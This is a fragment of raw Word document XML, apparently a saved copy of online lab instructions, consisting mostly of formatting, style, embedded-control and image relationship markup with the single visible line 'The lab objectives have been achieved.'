          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F06CD" w14:textId="5AAF1714" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="5008CB2C">
          <v:shape id="_x0000_i1275" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId132" w:name="DefaultOcxName82" w:shapeid="_x0000_i1275"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The lab objectives have been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A381FB7" w14:textId="77777777" w:rsidR="00A23699" w:rsidRPr="00D05942" w:rsidRDefault="00A23699"/>
    <w:sectPr w:rsidR="00A23699" w:rsidRPr="00D05942">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28B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41EA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6E4B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F468E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5576571">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1537085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4C"/>
    <w:rsid w:val="00247C4C"/>
    <w:rsid w:val="00927A0F"/>
    <w:rsid w:val="00A23699"/>
    <w:rsid w:val="00D059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621AAF86-C606-4D6E-B8E1-28DAEDB16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05942"/>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D05942"/>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05942"/>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D05942"/>
    <w:rPr>
      <w:rFonts w:ascii="ＭＳ Ｐゴシック" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="ＭＳ Ｐゴシック" w:cs="ＭＳ Ｐゴシック"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="task-list-item">
    <w:name w:val="task-list-item"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D0594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Web">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D0594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D05942"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typetext">
    <w:name w:val="typetext"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D05942"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D059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877017">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1148479580">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="175733785">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="375"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1702826918">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="316419889">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="906957656">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1346790445">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1325666821">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1871412231">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="452944956">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="309211100">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="87735626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control" Target="activeX/activeX72.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX9.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX24.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX28.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX49.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX53.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX6.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX66.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX3.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX15.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX20.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX32.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX35.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX46.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX80.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.wmf"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX54.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX57.xm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control" Target="activeX/activeX12.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX18.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX25.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX29.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX34.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX38.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX41.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX45.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX61.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX69.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX73.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX79.xml"/><Relationship Id="rId13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control" Target="activeX/activeX31.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX50.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX56.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX76.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control" Target="activeX/activeX11.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX16.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX27.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX40.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX63.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX71.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX78.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX23.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX33.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX37.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX44.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX48.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX52.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX58.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX68.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX83.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5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX10.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX19.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX65.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX74.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/27a69232-3147-4622-a040-37f066689f87?rc=10" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX36.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX43.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX47.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX51.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX60.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX62.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX77.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX81.xml"/><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control" Target="activeX/activeX4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX21.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX67.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX17.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX30.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX59.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX64.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX75.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/27a69232-3147-4622-a040-37f066689f87?rc=10" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX42.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX55.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX22.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX26.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX39.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX70.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX82.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX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2768</Words>
  <Characters>15779</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>131</Lines>
  <Paragraphs>37</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2023-07-12T15:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-12T15:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>